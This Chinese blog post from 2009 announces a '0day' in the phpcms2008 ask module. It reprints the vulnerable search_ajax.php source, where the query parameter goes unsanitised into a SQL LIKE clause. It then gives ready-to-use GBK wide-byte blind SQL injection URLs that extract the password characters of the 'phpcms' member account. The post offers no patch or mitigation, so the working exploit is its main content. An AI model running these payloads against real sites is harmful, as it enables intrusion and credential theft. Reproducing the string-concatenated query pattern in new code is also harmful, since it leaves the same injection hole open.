首页 > 脚本相关 > phpcms2008 ask的0DAY

phpcms2008 ask的0DAY

2009年3月20日 admin 发表评论 阅读评论

受影响程序: phpcms2008 gbk

漏洞文件:ask/search_ajax.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

<?php
require ‘./include/common.inc.php’;
require_once MOD_ROOT.‘include/ask.class.php’;
$ask = new ask();
header(‘Content-type: text/html; charset=utf-8′);
if(strtolower(CHARSET) != ‘utf-8′) $q = iconv(CHARSET, ‘utf-8′, $q);
if($q)
{
$where = “ title LIKE ’%$q%’ AND status = 5″;
}
else
{
exit(‘null’);
}
$infos = $ask->listinfo($where, ‘askid DESC’, ”, 10);
 
foreach($infos as $key=>$val)
{
$val['title'] = str_replace($q, ‘<span class=”c_orange”>’.$q.‘</span>’, $val['title']);
$info[$key]['title'] = CHARSET != ‘utf-8′ ? iconv(CHARSET, ‘utf-8′, $val['title']) : $val['title'];
$info[$key]['url'] = $val['url'];
}
 
echo(json_encode($info));
?>

ask/search_ajax.php?q=s%E6′/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0×706870636D73)>52%23
ask/search_ajax.php?q=s%E6′/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23
From http://www.nukeblog.cn/article/125.htm

分类: 脚本相关 标签: , , , , ,
  1. 本文目前尚无任何评论.
  1. 本文目前尚无任何 trackbacks 和 pingbacks.